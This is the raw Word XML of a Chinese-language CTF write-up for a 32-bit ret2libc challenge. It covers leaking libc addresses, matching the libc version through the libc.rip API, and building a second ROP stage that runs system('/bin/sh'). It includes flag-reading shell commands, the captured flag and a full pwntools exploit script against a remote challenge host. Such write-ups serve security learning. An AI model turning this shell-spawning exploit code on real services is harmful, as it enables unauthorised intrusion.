      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">函数的低位特征。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">依靠这些指纹信息对</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> libc </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">数据库进行检索，最终将目标锁定在了几个</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Ubuntu 2.31 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> i386 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">架构</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> libc </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">候选版本上。为了提升</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> exp </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的自动化与稳定性，我并未选择手动逐一计算地址，而是编写了一套可自动遍历验证候选</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> libc </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的逻辑：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根据候选列表自动下载对应的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> libc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将泄露出的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真实地址减去该</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> libc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的静态偏移，求得</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> libc </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">加载基址。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依据基址进一步计算出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函数的具体地址。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立即发送第二段</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> payload </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">进行尝试。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若哪个版本能够成功获取</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> shell </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">并且顺利读取出</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">flag，则认定该</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> libc </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">版本正确。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">最终成功匹配的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> libc </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">版本为：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">libc6-i386_2.31-0ubuntu9.11_amd64</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">相应的地址推算结果如下：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">puts   = 0xf7e171e0</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">system = 0xf7deb360</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="12"/>
    <w:bookmarkStart w:id="13" w:name="header-n107"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Step 5: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">构造二段</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">ROP，将字符串读入</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> .bss </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">段并执行</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> system("/bin/sh")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">第二阶段</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> payload </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的主要构思如下：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首先执行一次</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">read(0, bss, 8)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">函数调用，目的是将字符串</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/bin/sh\x00</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">写入到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段中。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函数的返回地址使其直接衔接至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安排刚才写入的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段地址作为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函数的输入参数。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">二阶段</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> payload </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">如下：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">payload2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elf.plt[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system_addr,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bss,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紧接着发送目标字符串：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">io.send(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">b"/bin/sh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32 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">位的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> cdecl </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">调用约定下，上述栈空间布局是完全合法的：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劫持执行流跳转至</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">read@plt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">处。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调用结束后的返回地址被指向了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的入口。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准备了三个参数：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">0, bss, 8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函数完成</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/bin/sh\x00</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的输入并返回后，程序会无缝切入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函数内部。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巧合且完美的是，此时栈顶参数恰好指向了刚刚完成字符串注入的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">bss</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">地址。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">这就等价于完成了如下操作：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pP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"/bin/sh"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="13"/>
    <w:bookmarkStart w:id="14" w:name="header-n134"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Step 6: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">获取</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Shell </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">并提取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成功夺取</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> shell </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">权限后，随即对几个常规存放</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> flag </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的路径进行读取尝试：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">cat /flag</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">cat /flag*</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">cat flag</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">cat flag*</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">最终服务器回显如下：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">flag{caefa3f9-c458-43d4-abad-bc6ec17bc225}</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="14"/>
    <w:bookmarkEnd w:id="15"/>
    <w:bookmarkStart w:id="16" w:name="header-n139"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Exploit Script</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">以下为该题目的完整</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> exp </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">脚本。其具备自动化执行以下流程的能力：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的泄露地址。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从备选库中自动检索匹配正确的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> libc。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计算并推导出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的具体地址。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组装并发送第二阶段</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ROP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">链。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自动搜索并打印出</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> flag。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ELF, context, flat, remote, sleep, u32</w:t>
      </w:r>
      <w:r>
        <w:br/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10002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rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">BIN_PATH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"attachment-27"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">LIBC_DIR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"libcs"</w:t>
      </w:r>
      <w:r>
        <w:br/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br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">context.arch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"i386"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">context.log_level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fetch_candidates():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"__libc_start_main"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"setvbuf"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"9c0"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"https://libc.rip/api/find"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ensure_libc(candidate):</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    LIBC_DIR.mkdir(exist_ok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requests.get(candidate[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"download_url"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">],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data.raise_for_status()</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        path.write_bytes(data.content)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stage1_leak(io, elf):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t xml:space="preserve">        elf.plt[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elf.sym[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"vul"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elf.got[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io.send(payload)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    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f"short leak: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leak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u32(leak[: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stage2_shell(io, elf, system_addr):</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    bss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elf.bss()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t xml:space="preserve">        elf.plt[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system_addr,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bss,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io.send(payload)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    sleep(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io.send(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">b"/bin/sh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sleep(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get_flag():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(BIN_PATH))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fetch_candidates()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f"candidate_count=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libc_path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ensure_libc(candidate)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        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(libc_path))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trying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remote(HOST, PORT,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io.recvline(timeout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(banner.decode(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).rstrip())</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            puts_addr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stage1_leak(io, elf)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        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puts_addr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system_addr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puts=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puts_addr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 system=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system_addr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stage2_shell(io, elf, system_addr)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            io.sendline(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b"echo MARK;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b"cat /flag 2&gt;/dev/null;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b"cat /flag* 2&gt;/dev/null;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b"cat flag 2&gt;/dev/null;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b"cat flag* 2&gt;/dev/null;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b"find / -maxdepth 3 -name 'flag*' 2&gt;/dev/null | xargs -r cat;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b"echo END"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r"flag</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">\\</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="PreprocessorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">[^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r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n]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\\</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, data, re.I)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success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data.lower():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possible flag output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io.close()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candidate produced a flag"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get_flag()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f"FLAG=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6"/>
    <w:bookmarkStart w:id="17" w:name="header-n153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flag{caefa3f9-c458-43d4-abad-bc6ec17bc225}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2026-05-16T04:02:43Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-05-16T04:02:43Z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